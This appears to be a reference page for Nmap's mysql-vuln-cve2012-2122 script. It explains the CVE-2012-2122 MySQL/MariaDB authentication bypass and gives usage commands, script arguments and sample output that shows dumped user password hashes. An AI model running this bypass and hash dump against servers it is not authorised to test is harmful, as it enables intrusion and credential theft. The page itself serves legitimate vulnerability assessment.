Nmap mysql-vuln-cve2012-2122 NSE Script
This page contains detailed information about how to use the mysql-vuln-cve2012-2122 NSE script. For list of all NSE scripts, visit the Nmap NSE Library.
Script Overview
Script source code: https://github.com/nmap/nmap/tree/master/scripts/mysql-vuln-cve2012-2122.nse
Script categories: discovery, intrusive, vuln
Target service / protocol: mysql
Target network port(s): 3306
List of CVEs: CVE-2012-2122
Script Description
The mysql-vuln-cve2012-2122.nse script attempts to bypass authentication in MySQL and MariaDB servers by exploiting CVE2012-2122. If its vulnerable, it will also attempt to dump the MySQL usernames and password hashes.
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable but exploitation depends on whether memcmp() returns an arbitrary integer outside of -128..127 range.
"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256. Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent."
Original public advisory:
Interesting post about this vuln:
Mysql-vuln-cve2012-2122 NSE Script Arguments
This is a full list of arguments supported by the mysql-vuln-cve2012-2122.nse script:
mysql-vuln-cve2012-2122.iterationsConnection retries. Default: 1500.
mysql-vuln-cve2012-2122.passMySQL password. Default: nmapFTW.
mysql-vuln-cve2012-2122.socket_timeoutSocket timeout. Default: 5s.
mysql-vuln-cve2012-2122.userMySQL username. Default: root.
vulns.shortIf set, vulnerabilities will be output in short format, a single line consisting of the host's target name or IP, the state, and either the CVE ID or the title of the vulnerability. Does not affect XML output.
vulns.showall
If set, the library will show and report all the registered vulnerabilities which includes the NOT VULNERABLE
ones. By default the library will only report the VULNERABLE
entries: VULNERABLE
, LIKELY VULNERABLE
, VULNERABLE (DoS)
and VULNERABLE (Exploitable)
. This argument affects the following functions: vulns.Report.make_output(): the default output function for portule/hostrule scripts. vulns.make_output(): the default output function for postrule scripts. vulns.format_vuln() and vulns.format_vuln_table() functions.
- - -
To use these script arguments, add them to the Nmap command line using the --script-args arg1=value,[arg2=value,..]
syntax. For example:
nmap --script=mysql-vuln-cve2012-2122 --script-args mysql-vuln-cve2012-2122.iterations=value,mysql-vuln-cve2012-2122.pass=value <target>
Mysql-vuln-cve2012-2122 NSE Script Example Usage
Here's an example of how to use the mysql-vuln-cve2012-2122.nse script:
nmap -p3306 --script mysql-vuln-cve2012-2122 <target>
nmap -sV --script mysql-vuln-cve2012-2122 <target>
Mysql-vuln-cve2012-2122 NSE Script Example Output
Here's a sample output from the mysql-vuln-cve2012-2122.nse script:
PORT STATE SERVICE REASON
3306/tcp open mysql syn-ack
| mysql-vuln-cve2012-2122:
| VULNERABLE:
| Authentication bypass in MySQL servers.
| State: VULNERABLE
| IDs: CVE:CVE-2012-2122
| Description:
| When a user connects to MariaDB/MySQL, a token (SHA
| over a password and a random scramble string) is calculated and compared
| with the expected value. Because of incorrect casting, it might've
| happened that the token and the expected value were considered equal,
| even if the memcmp() returned a non-zero value. In this case
| MySQL/MariaDB would think that the password is correct, even while it is
| not. Because the protocol uses random strings, the probability of
| hitting this bug is about 1/256.
| Which means, if one knows a user name to connect (and "root" almost
| always exists), she can connect using *any* password by repeating
| connection attempts. ~300 attempts takes only a fraction of second, so
| basically account password protection is as good as nonexistent.
|
| Disclosure date: 2012-06-9
| Extra information:
| Server granted access at iteration #204
| root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
| debian-sys-maint:*BDA9386EE35F7F326239844C185B01E3912749BF
| phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
| References:
| https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
| http://seclists.org/oss-sec/2012/q2/493
|_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
Mysql-vuln-cve2012-2122 NSE Script Example XML Output
There is no sample XML output for this module. However, by providing the -oX <file>
option, Nmap will produce a XML output and save it in the file.xml
file.
Author
- Paulino Calderon [email protected]>
References
- https://nmap.org/nsedoc/scripts/mysql-vuln-cve2012-2122.html
- https://github.com/nmap/nmap/tree/master/scripts/mysql-vuln-cve2012-2122.nse
- http://seclists.org/oss-sec/2012/q2/493
- https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
See Also
Related NSE scripts to the mysql-vuln-cve2012-2122.nse script:
- mysql-audit.nse
- mysql-brute.nse
- mysql-databases.nse
- mysql-dump-hashes.nse
- mysql-empty-password.nse
- mysql-enum.nse
- mysql-info.nse
- mysql-query.nse
- mysql-users.nse
- mysql-variables.nse
Visit Nmap NSE Library for more scripts.
Version
This page has been created based on Nmap version 7.92.